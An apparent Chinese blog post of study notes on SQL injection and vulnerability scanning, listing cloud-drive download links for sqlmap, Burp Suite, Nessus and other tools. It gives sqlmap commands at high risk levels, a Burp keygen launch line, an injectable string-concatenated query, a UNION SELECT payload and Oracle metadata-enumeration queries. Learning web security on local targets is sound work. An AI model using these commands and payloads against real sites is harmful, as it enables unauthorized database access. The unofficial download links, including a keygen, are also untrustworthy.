SQL注入以及漏洞扫描学习,工具整理
详细请看:https://mubu.com/doc/7m3poBzabXi
SQL注入_工具与指南
- 使用工具:
- sqlmap
- 链接:https://pan.baidu.com/s/1xdncbzZfE864WjeHfJWTHw
- 提取码:9vd1
- 抓包工具:burp suite
- 链接:https://pan.baidu.com/s/1YI9PpIwiatJFLgpAUuxdJA
- 提取码:vgnz
- (详细教程:https://www.cnblogs.com/fairyting/p/12604201.html)
- 数据操作工具:sqlplus
- 链接:https://pan.baidu.com/s/1r9KploJifmYWJM6tlsa9MA
- 提取码:84i1(下有详细安装教程)
- Kali镜像下载:
- 链接:https://pan.baidu.com/s/1c98a42JTimSR2s5EoFcgCQ
- 提取码:54j1
- Nessus 漏洞扫描文件:
- 链接:https://pan.baidu.com/s/1an8q6hLlyJeNZYadQ5oMKg
- 提取码:zsk8
- 阿D注入工具(绿色放心使用):
- 链接:https://pan.baidu.com/s/1Exruns-eTs3f6bt377dUYQ
- 提取码:gm5c
- SQLMAP安装教程:解压,放到python对应的安装目录中(新建sqlmap文件夹)例如:
-
SQLMAP(https://www.cnblogs.com/php09/p/10404560.html)
- 启动方式:(E:\Python\sqlmap>python sqlmap.py -h)
-
使用Get 进行SQL注入:
- E:\Python\sqlmap>python sqlmap.py -u “http://localhost:8080/HomeSubHtml/DataNews/Content.jsp?id=ODQ5&classname=TkVXU19JTkZPUk1BVElPTgAA” -p classname -f –level 4 –risk 3
-
使用POST扫描注入SQL(https://www.cnblogs.com/php09/p/10404560.html)
-
使用busp suite 进行抓包
- 1,推荐使用火狐浏览器,修改浏览器代理(cmd 到安装路径出入:java -Xmx2g -jar burp-loader-keygen.jar)
-
使用busp suite 进行抓包
- 修改代理(建议8080–》9999)
- 火狐修改代理
- 抓包数据
- 拦截包(跳转时关,获取时开)
- 对上述的信息放到txt文档中,进行保存
- 然后输入:python sqlmap.py -r ./workplace/test.txt -f 进行搜查
- Busp Suite 详细使用方法可看(Web安全深度剖析)
-
SQLPLUS:
-
下载文件(11版):http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
-
可直接下载百度网盘
- 链接:https://pan.baidu.com/s/1O-qQHDVqqvYPp06ttdRoIA
- 提取码:i35k
-
可直接下载百度网盘
-
下载文件(11版):http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html
- 2.解压两个包将两个包的所有文件放在同一目录下
- 3.配置sqlplus 的配置文件
- 在步骤2的目录下新建 network/admin目录并且新建文件 tnsnames.ora
- 4.tnsnames.ora的格式如下
- orcl=
- (DESCRIPTION =
- (ADDRESS_LIST=
- (ADDRESS=(PROTOCOL = TCP)(HOST = 192.168.62.200)(PORT = 1521))
- )
- (CONNECT_DATA =
- (SERVER = DEDICATED)
- (SERVICE_NAME = 198.168.62.200BT)
- )
- )
- 5.可以设置将当前目录加入path 环境变量中以方便操作系统查找 sqlplus.exe 的运行程序
- 最后输入
-
大致语句注入方法(以新闻资讯为例):
- 1,在网页中找到form/ajax(看到他的servlet位置)
- 最终找到相应的dao层代码和他的sql语句
- “select id, Theme,NETTIME,CREATE_TIME from (select id, Theme,CREATE_TIME,NETTIME from “+classname+” where show1=1 order by CREATE_TIME desc, NETTIME desc ) where rownum<=10″;
- 可知他的classname为注入点
-
Union方法
- 在网址链接中加入 union select null,null,null,null ……. from dual
-
简单获取元数据
- —查看表空间
- select tablespace_name from user_tablespaces;
- —查看当前用户所有表
- select table_name from user_tables ;
- —查看当前用户所有列
- select column_name from user_tab_columns where table_name=\’NEWS_INFORMATION\’;
- —查看当前用户所有对象(表明、约束、索引)
- select object_name from user_objects;
- 后可通过暴力猜解(通常用软件)
- 使用Kali虚拟机安装Nessus-8.5.1 进行漏洞扫描:
- 阿D注入工具(巨简单):
- 可见其注入点
- 百度教程即可:
版权声明:本文为smartisn原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。